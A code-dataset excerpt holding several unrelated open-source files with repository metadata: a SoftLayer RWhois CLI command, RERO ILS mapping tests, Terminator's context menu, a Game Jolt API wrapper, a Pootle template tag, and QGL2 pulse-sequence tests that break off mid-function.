}
depth++;
}
return sum;
}
}
'''
|
JulyKikuAkita/PythonPrac
|
cs15211/NestedListWeightSum.py
|
Python
|
apache-2.0
| 4,780 | 0.004603 |
"""Edit the RWhois data on the account."""
# :license: MIT, see LICENSE for more details.
import SoftLayer
from SoftLayer.CLI import environment
from SoftLayer.CLI import exceptions
import click
@click.command()
@click.option('--abuse', help='Set the abuse email address')
@click.option('--address1', help='Update the address 1 field')
@click.option('--address2', help='Update the address 2 field')
@click.option('--city', help='Set the city name')
@click.option('--company', help='Set the company name')
@click.option('--country', help='Set the two-letter country code')
@click.option('--firstname', help='Update the first name field')
@click.option('--lastname', help='Update the last name field')
@click.option('--postal', help='Set the postal code field')
@click.option('--public/--private',
default=None,
help='Flags the address as a public or private residence.')
@click.option('--state', help='Set the two-letter state code')
@environment.pass_env
def cli(env, abuse, address1, address2, city, company, country, firstname,
lastname, postal, public, state):
"""Edit the RWhois data on the account."""
mgr = SoftLayer.NetworkManager(env.client)
update = {
'abuse_email': abuse,
'address1': address1,
'address2': address2,
'company_name': company,
'city': city,
'country': country,
'first_name': firstname,
'last_name': lastname,
'postal_code': postal,
'state': state,
'private_residence': public,
}
if public is True:
update['private_residence'] = False
elif public is False:
update['private_residence'] = True
check = [x for x in update.values() if x is not None]
if not check:
raise exceptions.CLIAbort(
"You must specify at least one field to update.")
mgr.edit_rwhois(**update)
|
briancline/softlayer-python
|
SoftLayer/CLI/rwhois/edit.py
|
Python
|
mit
| 1,891 | 0 |
# -*- coding: utf-8 -*-
#
# RERO ILS
# Copyright (C) 2019 RERO
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Libraries elasticsearch mapping tests."""
from utils import get_mapping
from rero_ils.modules.locations.api import Location, LocationsSearch
def test_location_es_mapping(es, db, loc_public_martigny_data,
lib_martigny, org_martigny):
"""Test library elasticsearch mapping."""
search = LocationsSearch()
mapping = get_mapping(search.Meta.index)
assert mapping
loc = Location.create(
loc_public_martigny_data, dbcommit=True, reindex=True, delete_pid=True)
new_mapping = get_mapping(search.Meta.index)
assert mapping == new_mapping
loc.delete(force=True, dbcommit=True, delindex=True)
def test_location_search_mapping(app, locations_records):
"""Test library search mapping."""
search = LocationsSearch()
c = search.query('match', code='MARTIGNY-PUBLIC').count()
assert c == 1
c = search.query('match', code='SAXON-PUBLIC').count()
assert c == 1
|
rero/reroils-app
|
tests/ui/locations/test_locations_mapping.py
|
Python
|
gpl-2.0
| 1,616 | 0 |
#!/usr/bin/env python2
# Terminator by Chris Jones <cmsj@tenshu.net>
# GPL v2 only
"""terminal_popup_menu.py - classes necessary to provide a terminal context
menu"""
import string
from gi.repository import Gtk
from version import APP_NAME
from translation import _
from encoding import TerminatorEncoding
from terminator import Terminator
from util import err, dbg
from config import Config
from prefseditor import PrefsEditor
import plugin
class TerminalPopupMenu(object):
"""Class implementing the Terminal context menu"""
terminal = None
terminator = None
config = None
def __init__(self, terminal):
"""Class initialiser"""
self.terminal = terminal
self.terminator = Terminator()
self.config = Config()
def show(self, widget, event=None):
"""Display the context menu"""
terminal = self.terminal
menu = Gtk.Menu()
self.popup_menu = menu
url = None
button = None
time = None
self.config.set_profile(terminal.get_profile())
if event:
url = terminal.vte.match_check_event(event)
button = event.button
time = event.time
else:
time = 0
button = 3
if url and url[0]:
dbg("URL matches id: %d" % url[1])
if not url[1] in terminal.matches.values():
err("Unknown URL match id: %d" % url[1])
dbg("Available matches: %s" % terminal.matches)
nameopen = None
namecopy = None
if url[1] == terminal.matches['email']:
nameopen = _('_Send email to...')
namecopy = _('_Copy email address')
elif url[1] == terminal.matches['voip']:
nameopen = _('Ca_ll VoIP address')
namecopy = _('_Copy VoIP address')
elif url[1] in terminal.matches.values():
# This is a plugin match
for pluginname in terminal.matches:
if terminal.matches[pluginname] == url[1]:
break
dbg("Found match ID (%d) in terminal.matches plugin %s" %
(url[1], pluginname))
registry = plugin.PluginRegistry()
registry.load_plugins()
plugins = registry.get_plugins_by_capability('url_handler')
for urlplugin in plugins:
if urlplugin.handler_name == pluginname:
dbg("Identified matching plugin: %s" %
urlplugin.handler_name)
nameopen = _(urlplugin.nameopen)
namecopy = _(urlplugin.namecopy)
break
if not nameopen:
nameopen = _('_Open link')
if not namecopy:
namecopy = _('_Copy address')
icon = Gtk.Image.new_from_stock(Gtk.STOCK_JUMP_TO,
Gtk.IconSize.MENU)
item = Gtk.ImageMenuItem.new_with_mnemonic(nameopen)
item.set_property('image', icon)
item.connect('activate', lambda x: terminal.open_url(url, True))
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(namecopy)
item.connect('activate',
lambda x: terminal.clipboard.set_text(terminal.prepare_url(url), len(terminal.prepare_url(url))))
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Copy'))
item.connect('activate', lambda x: terminal.vte.copy_clipboard())
item.set_sensitive(terminal.vte.get_has_selection())
menu.append(item)
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Paste'))
item.connect('activate', lambda x: terminal.paste_clipboard())
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if not terminal.is_zoomed():
item = Gtk.ImageMenuItem.new_with_mnemonic(_('Split H_orizontally'))
image = Gtk.Image()
image.set_from_icon_name(APP_NAME + '_horiz', Gtk.IconSize.MENU)
item.set_image(image)
if hasattr(item, 'set_always_show_image'):
item.set_always_show_image(True)
item.connect('activate', lambda x: terminal.emit('split-horiz',
self.terminal.get_cwd()))
menu.append(item)
item = Gtk.ImageMenuItem.new_with_mnemonic(_('Split V_ertically'))
image = Gtk.Image()
image.set_from_icon_name(APP_NAME + '_vert', Gtk.IconSize.MENU)
item.set_image(image)
if hasattr(item, 'set_always_show_image'):
item.set_always_show_image(True)
item.connect('activate', lambda x: terminal.emit('split-vert',
self.terminal.get_cwd()))
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(_('Open _Tab'))
item.connect('activate', lambda x: terminal.emit('tab-new', False,
terminal))
menu.append(item)
if self.terminator.debug_address is not None:
item = Gtk.MenuItem.new_with_mnemonic(_('Open _Debug Tab'))
item.connect('activate', lambda x:
terminal.emit('tab-new', True, terminal))
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Close'))
item.connect('activate', lambda x: terminal.close())
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if not terminal.is_zoomed():
sensitive = not terminal.get_toplevel() == terminal.get_parent()
item = Gtk.MenuItem.new_with_mnemonic(_('_Zoom terminal'))
item.connect('activate', terminal.zoom)
item.set_sensitive(sensitive)
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(_('Ma_ximize terminal'))
item.connect('activate', terminal.maximise)
item.set_sensitive(sensitive)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
else:
item = Gtk.MenuItem.new_with_mnemonic(_('_Restore all terminals'))
item.connect('activate', terminal.unzoom)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if self.config['show_titlebar'] == False:
item = Gtk.MenuItem.new_with_mnemonic(_('Grouping'))
submenu = self.terminal.populate_group_menu()
submenu.show_all()
item.set_submenu(submenu)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.CheckMenuItem.new_with_mnemonic(_('Show _scrollbar'))
item.set_active(terminal.scrollbar.get_property('visible'))
item.connect('toggled', lambda x: terminal.do_scrollbar_toggle())
menu.append(item)
item = gtk.CheckMenuItem(_('Toggle tab visibility'))
item.set_active(terminal.scrollbar.get_property('visible'))
item.connect('toggled', self.toggle_tab_visibility)
menu.append(item)
if hasattr(Gtk, 'Builder'): # VERIFY FOR GTK3: is this ever false?
item = Gtk.MenuItem.new_with_mnemonic(_('_Preferences'))
item.connect('activate', lambda x: PrefsEditor(self.terminal))
menu.append(item)
profilelist = sorted(self.config.list_profiles(), key=string.lower)
if len(profilelist) > 1:
item = Gtk.MenuItem.new_with_mnemonic(_('Profiles'))
submenu = Gtk.Menu()
item.set_submenu(submenu)
menu.append(item)
current = terminal.get_profile()
group = None
for profile in profilelist:
profile_label = profile
if profile_label == 'default':
profile_label = profile.capitalize()
item = Gtk.RadioMenuItem(profile_label, group)
if profile == current:
item.set_active(True)
item.connect('activate', terminal.force_set_profile, profile)
submenu.append(item)
self.add_encoding_items(menu)
try:
menuitems = []
registry = plugin.PluginRegistry()
registry.load_plugins()
plugins = registry.get_plugins_by_capability('terminal_menu')
for menuplugin in plugins:
menuplugin.callback(menuitems, menu, terminal)
if len(menuitems) > 0:
menu.append(Gtk.SeparatorMenuItem())
for menuitem in menuitems:
menu.append(menuitem)
except Exception, ex:
err('TerminalPopupMenu::show: %s' % ex)
menu.show_all()
menu.popup(None, None, None, None, button, time)
return(True)
def toggle_tab_visibility(self, widget):
"""tab visibility"""
status = self.config['tab_position']
old_tab_position = self.config['old_tab_position']
if status == 'hidden':
if old_tab_position:
#if there's no oldstatus, hidden is default option
self.config['tab_position'] = old_tab_position
self.config.save()
else:
self.config['old_tab_position'] = status
self.config['tab_position'] = 'hidden'
self.config.save()
terminator = Terminator()
terminator.reconfigure()
def add_encoding_items(self, menu):
"""Add the encoding list to the menu"""
terminal = self.terminal
active_encodings = terminal.config['active_encodings']
item = Gtk.MenuItem.new_with_mnemonic(_("Encodings"))
menu.append (item)
submenu = Gtk.Menu ()
item.set_submenu (submenu)
encodings = TerminatorEncoding ().get_list ()
encodings.sort (lambda x, y: cmp (x[2].lower (), y[2].lower ()))
current_encoding = terminal.vte.get_encoding ()
group = None
if current_encoding not in active_encodings:
active_encodings.insert (0, _(current_encoding))
for encoding in active_encodings:
if encoding == terminal.default_encoding:
extratext = " (%s)" % _("Default")
elif encoding == current_encoding and \
terminal.custom_encoding == True:
extratext = " (%s)" % _("User defined")
else:
extratext = ""
radioitem = Gtk.RadioMenuItem (_(encoding) + extratext, group)
if encoding == current_encoding:
radioitem.set_active (True)
if group is None:
group = radioitem
radioitem.connect ('activate', terminal.on_encoding_change,
encoding)
submenu.append (radioitem)
item = Gtk.MenuItem.new_with_mnemonic(_("Other Encodings"))
submenu.append (item)
#second level
submenu = Gtk.Menu ()
item.set_submenu (submenu)
group = None
for encoding in encodings:
if encoding[1] in active_encodings:
continue
if encoding[1] is None:
label = "%s %s" % (encoding[2], terminal.vte.get_encoding ())
else:
label = "%s %s" % (encoding[2], encoding[1])
radioitem = Gtk.RadioMenuItem (label, group)
if group is None:
group = radioitem
if encoding[1] == current_encoding:
radioitem.set_active (True)
radioitem.connect ('activate', terminal.on_encoding_change,
encoding[1])
submenu.append (radioitem)
|
wpjunior/terminator
|
terminatorlib/terminal_popup_menu.py
|
Python
|
gpl-2.0
| 11,983 | 0.004423 |
# Game Jolt Trophy for Python
# by viniciusepiplon - vncastanheira@gmail.com
# version 1.1
# Python 3.x stable
# Python 2.7 unstable
# This is a general Python module for manipulating user data and
# trophies (achievments) on GameJolt.
# Website: www.gamejolt.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/lgpl.txt>.
import sys
import hashlib
import json
if sys.hexversion > 0x03000000:
try:
import urllib.request
except:
raise ImportError
else:
try:
import urllib
except:
raise ImportError
class GameJoltTrophy(object):
"""
The Class constructors.
The class requires four essential parameters: user name, user token, game ID
and private code. Check the API documentation on Game Jolt's website to see
what those parameters they are. In this code, I used the same names on the
site. If you read it, you can understand what's going on here.
Note that *username* and *user token* can be changed later, but the game id
and the private key must be defined first, as they won't change.
"""
def __init__(self, username, user_token, game_id, private_key):
super(GameJoltTrophy, self).__init__()
self.username = username
self.user_token = user_token
self.game_id = game_id
self.private_key = private_key
self.URL = 'http://gamejolt.com/api/game/v1'
self.nativeTraceback = False
#====== TOOLS ======#
# Used for changing users, setting and/or fixing authentications
def changeUsername(self, username):
"""
Changes the *username* contained on the object
Used for changing, setting and/or fixing authentications
"""
self.username = username
#
def changeUserToken(self, user_token):
"""
Changes the *user token* contained on the object
Used for changing, setting and/or fixing authentications
"""
self.user_token = user_token
def setSignatureAndgetJSONResponse(self, URL):
"""
Generates a signature from the url and returns the same address, with the
signature added to it.
All singatures are generated with md5, but can be modified below.
This is the only function that generates the signature, so changing the
encoding to SHA1 or other format will affect all URL requests.
"""
if sys.hexversion > 0x03000000:
try:
link = URL + str(self.private_key)
link = link.encode('ascii')
signature = hashlib.md5(link).hexdigest()
URL += '&'+'signature='+str(signature)
response = urllib.request.urlopen(URL)
output = response.read().decode('utf8')
return json.loads(output)['response']
except Exception as error:
if not self.nativeTraceback:
return {'success': 'false', 'message': str(error)}
else:
raise error
else:
try:
link = URL + str(self.private_key)
link = link.encode('ascii')
signature = hashlib.md5(link).hexdigest()
URL += '&'+'signature='+str(signature)
response = urllib.urlopen(URL)
output = response.read().decode('utf8')
return json.loads(output)['response']
except Exception as error:
if not self.nativeTraceback:
return {'success': 'false', 'message': str(error)}
else:
raise error
def setNativeTraceback(self, value):
if not type(value) == bool: self.nativeTraceback = value
else: raise TypeError
#====== USERS ======#
def fetchUserInfo(self):
"""
Fetches the infos of a user as a dictionary type.
**ATTENTION**: it returns a dictionary type value with the key *users*,
containing the user being fetched.
Right now it only fetches the user stored in the object, but can retrive a
list of users. This is not available now, will be implemented later.
"""
URL = self.URL+'/users/?format=json&game_id='+str(self.game_id)+'&'+'username='+str(self.username)
return self.setSignatureAndgetJSONResponse(URL)
def authenticateUser(self):
"""
Authenticate a user defined in the object variable.
The purpose of this method is to check if the user's credential
(name and token) are valid. Then, you're safe to call the other methods
Return a boolean type value.
"""
URL = self.URL+'/users/auth/?format=json&game_id='+str(self.game_id)+'&'+'username='+str(self.username)+\
'&'+'user_token='+str(self.user_token)
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
#====== TROPHIES ======#
def fetchTrophy(self, achieved=None, trophy=None):
"""
The 'trophy' argument receives a list of one or more ID of trophies to be
returned. It ignores the 'achieved' argument, so pass a 'None' value to it.
where you pass the desired number between the braces, separating each trophy
ID with commas.
If 'achieved' is:
> set to True, only the achieved trophies will be returned
> set to False, only trophies that the user hasn't achieved yet will be
returned
> set to None (no argument is passed), then all trophies will be retrieved
"""
URL = self.URL+'/trophies/?format=json&'+\
'game_id='+str(self.game_id)+'&'+'username='+str(self.username)+'&'+'user_token='+str(self.user_token)
if achieved != None:
URL += '&achieved='
if achieved == True: URL += 'true'
if achieved == False: URL += 'false'
else:
if trophy != None:
if type(trophy) == int:
URL += '&trophy_id='+str(trophy)+'&'
elif type(trophy) == list:
miniurl = '&trophy_id='
for t in trophy:
miniurl += str(t)+','
miniurl = miniurl[:1]
URL += miniurl
else:
raise 'Invalid type for trophy: must be int or list.'
return self.setSignatureAndgetJSONResponse(URL)
def addAchieved(self, trophy_id):
"""
Sets a winning trophy for the user.
If the parameters are valid, returns True. Otherwise, it returns False.
"""
URL = self.URL+'/trophies/add-achieved/?'+\
'game_id='+str(self.game_id)+'&'+'user_token='+str(self.user_token)+'&'+'username='+str(self.username)+\
'&'+'trophy_id='+str(trophy_id)
try:
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
except Exception as error:
return {'success': 'false', 'message': str(error)}
#====== SCORES ======#
def fetchScores(self, limit=10, table_id=None, user_info_only=False):
"""
The *limit* argument is set to 10 by default, but can't be more than 100. If
you pass a higher number, the method will automatically set to the maximum
size.
*table_id* if for returning scores for a specific table. If no arguments are
passed (None), it will return all the tables avaliable.
If *user_info_only* is set to True, only scores for the player stored on the
object will be returned.
"""
URL = self.URL+'/scores/?format=json&game_id='+str(self.game_id)
if user_info_only:
URL += '&username='+str(self.username)+'&user_token='+str(self.user_token)
# ID of the score table
if table_id:
URL += '&table_id='+str(table_id)
# Maximum number of scores should be 100 according with the GJAPI
if limit > 100:
limit = 100
URL += '&limit='+str(limit)
return self.setSignatureAndgetJSONResponse(URL)
def addScores(self, score, sort, table_id=None, extra_data='', guest=False, guestname=''):
"""
This method adds a score to the player or guest.
*score* is a string value describing the score value.
*sort* is the actual score value, a number value. But can be a string too.
For *table_id*, check the fetchScores method.
*extra_data* is a string value with any data you would like to store. It
doesn't appear on the site.
If you want to store a score for a guest instead of the user, you:
> set True to 'guest' parameter.
> set a string value with the name of the guest on 'guestname'
"""
URL = self.URL+'/scores/add/?format=json&game_id='+str(self.game_id)+\
'&score='+str(score)+'&sort='+str(sort)
if not guest:
URL += '&username='+str(self.username)+'&user_token='+str(self.user_token)
else:
URL += '&guest='+str(guestname)
if extra_data:
URL += '&extra_data='+extra_data
if table_id:
URL += '&table_id='+str(table_id)
return self.setSignatureAndgetJSONResponse(URL)
def scoreTable(self):
""" Returns the tables containing the high scores for the game."""
URL = self.URL+'/scores/tables/?format=json&game_id='+str(self.game_id)
return self.setSignatureAndgetJSONResponse(URL)
#====== SESSIONS ======#
def openSession(self):
"""
Opens a game session for a particular user. Allows you to tell Game Jolt
that a user is playing your game. You must ping the session
(**pingSession** method) to keep it active and you must close it when you're
done with it. Note that you can only have one open session at a time.
If you try to open a new session while one is running, the system will close
out your current session before opening a new one.
Return a boolean value: True if a session opened with sucess, False otherwise.
"""
URL = self.URL+'/sessions/open/?format=json&game_id='+str(self.game_id)+\
'&username='+str(self.username)+'&user_token='+str(self.user_token)
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
def closeSession(self):
"""
Closes the active section.
Return a boolean value: True if a session closed with sucess, False otherwise.
"""
URL = self.URL+'/sessions/close/?format=json&game_id='+str(self.game_id)+\
'&username='+str(self.username)+'&user_token='+str(self.user_token)
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
def pingSession(self, active=True):
"""
Pings an open session to tell the system that it's still active. If the
session hasn't been pinged within 120 seconds, the system will close the
session and you will have to open another one. It's recommended that you
ping every 30 seconds or so to keep the system from cleaning up your session.
You can also let the system know whether the player is in an "active" or
"idle" state within your game through this call. To do this, you pass an
argument to the *active* variable. If it is set to True, then the player
state will be set to **active**. If False, it will be set to **idle**.
Return a boolean value: True if a session pinged with sucess, False otherwise.
"""
URL = self.URL+'/sessions/ping/?format=json&game_id='+str(self.game_id)+\
'&username='+str(self.username)+'&user_token='+str(self.user_token)
if active: URL += '&status=active'
else: URL += '&status=idle'
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
#====== DATA STORAGE ==#
def fetchData(self, key, user_info_only=False):
"""
Return the data stored.
The *key* variable is the identification value for the particular data you
want to retrieve.
If you want to return data only for the user stored in the object, the last
argument is set to True.
Returns a dictionary containing the data.
"""
URL = self.URL+'/data-store/?format=json&game_id='+str(self.game_id)+\
'&key='+str(key)
if user_info_only:
URL += '&username='+str(self.username)+'&user_token='+str(self.user_token)
return self.setSignatureAndgetJSONResponse(URL)
def storeData(self, key, data, user_info_only=False):
"""
Set a data to be stored.
The *key* argument is to define the identifier of the data.
The *data* argument is the data itself, of string type.
If you wish to pass the data only for this stored in the object, the last
argument is set to True.
Return a boolean value: True if the data was stored with sucess, False
otherwise.
"""
URL = self.URL+'/data-store/set/?format=json&game_id='+str(self.game_id)+\
'&key='+str(key)+'&data='+str(data)
if user_info_only:
URL += '&username='+str(self.username)+'&user_token='+str(self.user_token)
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
def removeData(self, key):
"""
Remove a data with the given key.
*key* is the data identification.
Return a boolean value: True if the data was removed with sucess, False
otherwise.
"""
URL = self.URL+'/data-store/remove/?format=json'+'&game_id='+str(self.game_id)+'&key='+str(key)
return self.setSignatureAndgetJSONResponse(URL) == 'true'
def getDataKeys(self):
"""
Return all the keys avaliable.
The return type is a dictionary object with a list of dictionaries. Each of
those dictionaries contains a key with the name **key** and contain it's value.
Exemple:
{'keys': [{'key': '1'}, {'key': '2'}, ...], 'success': 'true' }
"""
URL = self.URL+'/data-store/get-keys/?format=json'+'&game_id='+str(self.game_id)
return self.setSignatureAndgetJSONResponse(URL)
|
yaelatletl/gj_e3d_api
|
py_gjapi.py
|
Python
|
lgpl-3.0
| 13,032 | 0.028392 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009, 2013 Zuza Software Foundation
#
# This file is part of Pootle.
#
# Pootle is free software; you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# Pootle is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# Pootle; if not, see <http://www.gnu.org/licenses/>.
from django import template
register = template.Library()
@register.inclusion_tag('terminology/term_edit.html', takes_context=True)
def render_term_edit(context, form):
template_vars = {
'unit': form.instance,
'form': form,
'language': context['language'],
'source_language': context['source_language'],
}
return template_vars
|
arky/pootle-dev
|
pootle/apps/pootle_terminology/templatetags/terminology_tags.py
|
Python
|
gpl-2.0
| 1,119 | 0 |
# Copyright 2016 by Raytheon BBN Technologies Corp. All Rights Reserved.
'''
Test the qgl2/basic_sequences to ensure they replicate the QGL1 functionality.
'''
import datetime
import unittest
import numpy as np
from math import pi
import random
from pyqgl2.main import compile_function
from pyqgl2.qreg import QRegister
from QGL import *
from test.helpers import testable_sequence, \
channel_setup, assertPulseSequenceEqual, \
get_cal_seqs_1qubit, get_cal_seqs_2qubits, \
stripWaitBarrier, flattenPulseBlocks
class TestAllXY(unittest.TestCase):
def setUp(self):
channel_setup()
def test_AllXY(self):
# QGL1 uses QubitFactory, QGL2 uses QRegister
q1 = QubitFactory('q1')
qr = QRegister(q1)
# Specify the QGL1 we expect QGL2 to generate
# Note in this case we specify only a sample of the start
expectedseq = []
# Expect a single sequence 4 * 2 * 21 pulses long
# Expect it to start like this:
expectedseq += [
qwait(channels=(q1,)), # aka init(q1) aka Wait(q1)
Id(q1),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1)
]
# To turn on verbose logging in compile_function
# from pyqgl2.ast_util import NodeError
# from pyqgl2.debugmsg import DebugMsg
# NodeError.MUTE_ERR_LEVEL = NodeError.NODE_ERROR_NONE
# DebugMsg.set_level(0)
# Now compile the QGL2 to produce the function that would generate the expected sequence.
# Supply the path to the QGL2, the main function in that file, and a list of the args to that function.
# Can optionally supply saveOutput=True to save the qgl1.py
# file,
# and intermediate_output="path-to-output-file" to save
# intermediate products
resFunction = compile_function("src/python/qgl2/basic_sequences/AllXY.py",
"AllXY",
(qr,))
# Run the QGL2. Note that the generated function takes no arguments itself
seqs = resFunction()
# Transform the returned sequences into the canonical form for comparing
# to the explicit QGL1 version above.
# EG, 'flatten' any embedded lists of sequences.
seqs = testable_sequence(seqs)
# Assert that the QGL1 is the same as the generated QGL2
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
# Tests list of lists of function references, instead of sub-functions
def test_AllXY_alt1(self):
q1 = QubitFactory('q1')
qr = QRegister('q1')
expectedseq = []
# Expect a single sequence 4 * 2 * 21 pulses long
# Expect it to start like this:
expectedseq += [
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1)
]
resFunction = compile_function(
"test/code/AllXY_alt.py",
"doAllXY",
(qr,))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
def test_AllXY_alt2(self):
q1 = QubitFactory('q1')
qr = QRegister('q1')
expectedseq = []
# Expect a single sequence 4 * 2 * 21 pulses long
# Expect it to start like this:
expectedseq += [
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1)
]
resFunction = compile_function(
"test/code/AllXY_alt.py",
"doAllXY2",
(qr,))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
# BlankingSweeps are OBE, so not tested
class TestCR(unittest.TestCase):
def setUp(self):
channel_setup()
def test_PiRabi(self):
controlQ = QubitFactory('q1')
targetQ = QubitFactory('q2')
controlQR = QRegister(controlQ)
targetQR = QRegister(targetQ)
edge = EdgeFactory(controlQ, targetQ)
lengths = np.linspace(0, 4e-6, 11)
riseFall=40e-9
amp=1
phase=0
calRepeats = 2
expected_seq = []
# Seq1
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
Id(controlQ),
flat_top_gaussian(edge, riseFall, length=l, amp=amp, phase=phase),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Seq2
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
X(controlQ),
flat_top_gaussian(edge, riseFall, length=l, amp=amp, phase=phase),
X(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Add calibration
calseq = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
expected_seq += calseq
expected_seq = testable_sequence(expected_seq)
resFunction = compile_function("src/python/qgl2/basic_sequences/CR.py",
"PiRabi", (controlQR, targetQR, lengths, riseFall, amp, phase, calRepeats))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expected_seq)
def test_EchoCRLen(self):
controlQ = QubitFactory('q1')
targetQ = QubitFactory('q2')
cR = QRegister('q1') # Equivalent to QRegister(controlQ)
tR = QRegister('q2')
# FIXME: Better values!?
lengths = np.linspace(0, 2e-6, 11)
riseFall=40e-9
amp=1
phase=0
calRepeats=2
canc_amp=0
canc_phase=np.pi/2
expected_seq = []
# Seq1
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
Id(controlQ),
echoCR(controlQ, targetQ, length=l, phase=phase, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
Id(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Seq2
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
X(controlQ),
echoCR(controlQ, targetQ, length=l, phase=phase, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
X(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Add calibration
cal_seqs = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
expected_seq += cal_seqs
expected_seq = testable_sequence(expected_seq)
resFunction = compile_function("src/python/qgl2/basic_sequences/CR.py",
"EchoCRLen",
(cR, tR, lengths, riseFall, amp, phase, calRepeats, canc_amp, canc_phase) )
seqs = resFunction()
seqs = testable_sequence(seqs)
self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expected_seq)
def test_EchoCRPhase(self):
controlQ = QubitFactory('q1')
targetQ = QubitFactory('q2')
cR = QRegister('q1')
tR = QRegister('q2')
phases = np.linspace(0, pi/2, 11)
riseFall=40e-9
amp=1
length=100e-9
calRepeats=2
canc_amp=0
canc_phase=np.pi/2
expected_seq = []
# Seq1
for p in phases:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
Id(controlQ),
echoCR(controlQ, targetQ, length=length, phase=p, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
Barrier(controlQ, targetQ),
X90(targetQ),
Id(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Seq2
for p in phases:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
X(controlQ),
echoCR(controlQ, targetQ, length=length, phase=p, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
Barrier(controlQ, targetQ),
X90(targetQ),
X(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Add calibration
cal_seqs = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
expected_seq += cal_seqs
expected_seq = testable_sequence(expected_seq)
resFunction = compile_function("src/python/qgl2/basic_sequences/CR.py",
"EchoCRPhase",
(cR, tR, phases, riseFall, amp, length, calRepeats, canc_amp, canc_phase))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expected_seq)
class TestDecoupling(unittest.TestCase):
def setUp(self):
channel_setup()
def test_HahnEcho(self):
q = QubitFactory('q1')
qr = QRegister('q1')
steps = 11
pulseSpacings = np.linspace(0, 5e-6, steps)
periods = 0
calRepeats=2
expectedseq = []
for k in range(len(pulseSpacings)):
expectedseq += [
qwait(channels=(q,)),
X90(q),
Id(q, pulseSpacings[k]),
Y(q),
Id(q, pulseSpacings[k]),
U90(q, phase=2*pi*periods/len(pulseSpacings)*k),
MEAS(q)
]
# Add calibration
cal = get_cal_seqs_1qubit(q, calRepeats)
expectedseq += cal
expectedseq = testable_sequence(expectedseq)
